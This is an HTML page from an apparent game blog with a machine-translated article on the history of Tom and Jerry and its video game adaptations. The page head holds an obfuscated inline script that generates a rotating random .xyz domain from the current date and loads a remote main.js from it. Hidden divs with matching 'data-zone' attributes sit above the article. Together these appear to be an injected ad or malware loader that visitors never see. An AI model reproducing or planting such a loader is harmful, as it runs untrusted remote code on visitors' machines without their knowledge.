<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="With the growth of people’s age, all kinds of troubles and pressures fill every day of our life. There is little time for us to put down our work and have a good rest, as if there are fewer and fewer">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="Cat and mouse is probably the favorite CP of all childhood">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="With the growth of people’s age, all kinds of troubles and pressures fill every day of our life. There is little time for us to put down our work and have a good rest, as if there are fewer and fewer">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/dc47411e430b4f8a8f4fb71ff6ee31fe.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/48088f73d44d4d21b9a1777932e9a767.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/0c413b4f5b5f4752b40b9d973b6187b2.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/23428de792974d6094e5a5535da41a29.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/c6caea6f1f7a4f7fbe68c667907da145.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/24aa4e05641249109a65acf40365825b.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/fcbed67d0a9544a8b8d9f2349c8e4523.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/3c713398a4a04a60be12c70743662df8.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/12bbe28776bc4269b209cdb33a14e916.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/eb7686021ec547178244e2146407d526.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/5f1031a2a9b049b58bb7473a66a82b50.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/f0f6f758f1024dca8571225871189a1c.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:48.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Cat and mouse is probably the favorite CP of all childhood">
<meta name="twitter:description" content="With the growth of people’s age, all kinds of troubles and pressures fill every day of our life. There is little time for us to put down our work and have a good rest, as if there are fewer and fewer">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/dc47411e430b4f8a8f4fb71ff6ee31fe.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>Cat and mouse is probably the favorite CP of all childhood | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Cat and mouse is probably the favorite CP of all childhood</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>With the growth of people’s age, all kinds of troubles and pressures fill every day of our life. There is little time for us to put down our work and have a good rest, as if there are fewer and fewer things that can bring us happiness in life. When I was a kid, we could enjoy a simple paper plane or a few colorful cards. And the cartoons that make us most happy are those that we can’t forget today. Animation can bring different influences to everyone’s growth, but our leading role today, cat and mouse, is the one with the greatest influence.<br><img src="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/dc47411e430b4f8a8f4fb71ff6ee31fe.jpg" alt="Cat and mouse is probably the favorite CP of all childhood"><br>In the early years, whether in animation or literary works, “mouse” always appeared as a villain, representing evil and cunning. The cat, which is just opposite to it, must be a symbol of justice, courage and wisdom. Chinese audiences who are used to watching “Sheriff black cat” and then turn to watch “cat and mouse” from other countries will surely wonder how the positions of the cat and mouse are completely reversed? It may be said that Disney’s Mickey Mouse is also a positive image of the mouse, but there is no cat in Mickey Mouse. Even in such a situation, cat and mouse still obsesses the children so much that they forget to eat and sleep, even when their snot drips onto the stool.<br><img src="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/48088f73d44d4d21b9a1777932e9a767.jpg" alt="Cat and mouse is probably the favorite CP of all childhood"><br>The most famous villain mouse image is the “one ear” in Sheriff black cat</p>
<h1 id="born-before-World-War-II"><a href="#born-before-World-War-II" class="headerlink" title="born before World War II"></a>born before World War II</h1><p>Tom and Jerry is also known as Tom and Jerry. The first animation of the series was born in 1940, and was produced and released by Metro Goldwyn Mayer (MGM), one of the eight major Hollywood film companies. Although it was born early, it was officially introduced to the mainland of China in the 1980s and is well known to us on the other side of the ocean. Although MGM film company is rarely mentioned at present, it has been a great power at that time. Their logo is believed that most people will not feel strange, that is, the lion surrounded by a circle of film and roaring a few times before the film starts.<br><img src="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/0c413b4f5b5f4752b40b9d973b6187b2.jpg" alt="Cat and mouse is probably the favorite CP of all childhood"><br>That’s what you thought it was<br><img src="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/23428de792974d6094e5a5535da41a29.jpg" alt="Cat and mouse is probably the favorite CP of all childhood"><br>Actually, it’s like this. Lions have strict training and don’t hurt people<br>A year before the first episode of cat and mouse, director William Hannah and Joseph Barbera were planning to launch a new animation, which was not the first collaboration between the two men, who had previously CO produced an animated film called “galloping girl” (about horses). The two plan to set the protagonists of the animation as “cat” and “mouse” to show a series of comic effects with the conflict between them. After the first episode is finished, the two will name the cat “Jasper” and the mouse “jinx”.<br>For some reason, before the animation was released, the two men deleted the name of mouse jinks. After all, according to the logic of reality, the name of domestic cat will definitely be named by the owner, while the name of the mouse hidden in the home will never be named by anyone. In February 1940, the first episode of the series was officially released in the cinema. This animated short film is called “push gets the boot”.<br><img src="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/c6caea6f1f7a4f7fbe68c667907da145.jpg" alt="Cat and mouse is probably the favorite CP of all childhood"><br>At first, the design of a cat was more like a real cat than a cartoon character<br>At first, the production team didn’t plan to make follow-up works, and even didn’t attach any importance to the series. However, due to the unprecedented popularity after the release, the company realized that the animation was actually a potential stock, with great value to be explored, so the company opened a green light for the creation of the animation. At this time, they suddenly think of a question: since they are going to make a formal production, does the character always have a name? So we decided the names of the two roles by the way of internal bidding, and finally named them “Tom” and “Jerry”. Since then, we are familiar with the role images.<br><img src="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/24aa4e05641249109a65acf40365825b.jpg" alt="Cat and mouse is probably the favorite CP of all childhood"><br>Over the years, the production team of cat and mouse has changed again and again, and the characters’ images have also changed again and again</p>
<p>#The animation is short and original<br>Each episode of cat and mouse is very short, only about 10 minutes, but we can clearly feel the producer’s intention. The fluency of animation is very high. Almost every frame is a different picture. At the same time, the imagination of the plot is boundless. You can never imagine what will happen next second. There are not many actual sound effects in the animation. Each action and behavior of the character is replaced by orchestral music with different melody. For example, when the character bumps into the wall, it will be expressed with clear gongs When chasing, we will use the large and small bugles with rapid rhythm to express, which makes the overall appearance very powerful.<br>After the first episode of animation broadcast, in the following 18 years, MGM launched 114 episodes of “cat and mouse” animated short films. During this period, MGM has won more than ten Oscar nominations for best animated short films, seven of which have won awards successfully. At that time, almost no one can shake such an award, even the senior Disney at that time did not have such treatment.<br><img src="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/fcbed67d0a9544a8b8d9f2349c8e4523.jpg" alt="Cat and mouse is probably the favorite CP of all childhood"><br>The production team made no secret of putting the honors in the title of the animation<br>All the audience friends who have seen the cartoon should know that although Tom and Jerry are dead rivals in the cartoon, it is common for them to fight openly and secretly, and they will choose to cooperate when necessary. Besides the fight, they are also good friends with deep friendship. They will feel sad and lonely for each other’s leaving. The audience likes this cartoon not only because it can bring We have all kinds of jokes, but how can such a pair of CP who are also enemies, friends, love and kill each other not be liked by people? Animation is accompanied by a little warmth at the same time of funny. Although it is a simple and clear funny animation, it does not lose the connotation of a work of education and entertainment.<br><img src="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/3c713398a4a04a60be12c70743662df8.jpg" alt="Cat and mouse is probably the favorite CP of all childhood"></p>
<h1 id="video-games-for-the-regular-meeting"><a href="#video-games-for-the-regular-meeting" class="headerlink" title="video games for the regular meeting"></a>video games for the regular meeting</h1><p>In that era, the popular idea of a film and television work was that it would surely attract the attention of other fields, and then it would also drive a wave of hot sales of peripheral products, children’s story books, toys, clothing, shoes and hats, etc. emerge in an endless stream, and naturally there would be no shortage of video games. The high popularity of animation has been maintained until the emergence of FC red and white machine, and the adaptation game of cat and mouse has naturally logged into FC.<br>The game “cat and mouse” on FC is just like the cartoon. There are only two roles to play the opponent’s play, and the development team of the game is only two people. Therefore, the production of the game is relatively simple. The playing method of the game is to pass the horizontal version. The players only need to play Jerry’s cheese collection to defeat Tom. Although there are many scenes honoring the cartoon, the quality of the game The quantity is not very satisfactory.<br><img src="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/12bbe28776bc4269b209cdb33a14e916.jpg" alt="Cat and mouse is probably the favorite CP of all childhood"><br>The color matching in the game is very strange. It’s dazzling after watching for a long time<br>One of the more well-known works is the PC based fighting game released by Ubisoft in 2002. Different from the previous cat and mouse game, Tom and Jerry in this game are finally able to compete fairly. Players and opponents can use various props and objects to attack each other in a closed environment. This style of throwing things and taking weapons to fight is similar to “Nintendo star fights”. Because this work supports local doubles, it was also popular at that time and favored by many small players.<br><img src="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/eb7686021ec547178244e2146407d526.jpg" alt="Cat and mouse is probably the favorite CP of all childhood"><br>Scene restoration is quite high, but the modeling of characters is not flattering<br>At present, Netease, a domestic company, has launched a derivative mobile game named “cat and mouse” on the mobile platform. To be honest, the first impression of IP adapted games is not very good in the prevailing trend of consumer sentiment. Therefore, it is inevitable to worry about whether the content will be strange. The hand game end is neither a horizontal board game nor a fighting game. At first, Netease planned to launch a horizontal version of Parkour game in the design, but later added an asymmetric confrontation mode. Compared with the previous one-to-one game, the new mode is more noisy.<br><img src="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/5f1031a2a9b049b58bb7473a66a82b50.jpg" alt="Cat and mouse is probably the favorite CP of all childhood"><br>In the game, players play either 4-to-1 rats or 1-to-4 cats. Rats collect cheese and take out houses, while cats expel rats. In fact, it is quite interesting to combine the IP of “cat and mouse” with “killing chickens”. In a word, it is the best work of IP’s overall quality so far.<br><img src="http://maiygu.xyz/2019/11/08/Cat and mouse is probably the favorite CP of all childhood/f0f6f758f1024dca8571225871189a1c.jpg" alt="Cat and mouse is probably the favorite CP of all childhood"><br>Whether it’s adults or children, this noisy game is perfect<br>    concluding remarks<br>Time flies, we are no longer young, and the happy time of sitting in front of the computer with friends holding half of the keyboard to play each other has long gone, and “cat and mouse” is 80 years old, no longer favored by children today. Back to the topic at the beginning of our article, we can easily get happiness from some simple things in childhood, which is particularly easy to be satisfied. Now, looking back, we have to worry about the living expenses of this month while talking about our childishness at that time.<br>Time will never stop passing. Maybe it’s not your intention to step into this noisy society, but it must be life’s forced helplessness. We are old, they are old, we should think about the problems that the adults should think about, but I believe that in everyone’s heart, the one who was full of happy smile will always exist.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/Craig studio, the successor of CRPG who is more brave and fearless/" rel="next" title="Craig studio, the successor of CRPG who is more brave and fearless">
                <i class="fa fa-chevron-left"></i> Craig studio, the successor of CRPG who is more brave and fearless
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/Count the players in the game world! It's more terrible than boss. The worst one is in the novice village/" rel="prev" title="Count the players in the game world! It's more terrible than boss. The worst one is in the novice village">
                Count the players in the game world! It's more terrible than boss. The worst one is in the novice village <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#born-before-World-War-II"><span class="nav-number">1.</span> <span class="nav-text">born before World War II</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#video-games-for-the-regular-meeting"><span class="nav-number">2.</span> <span class="nav-text">video games for the regular meeting</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
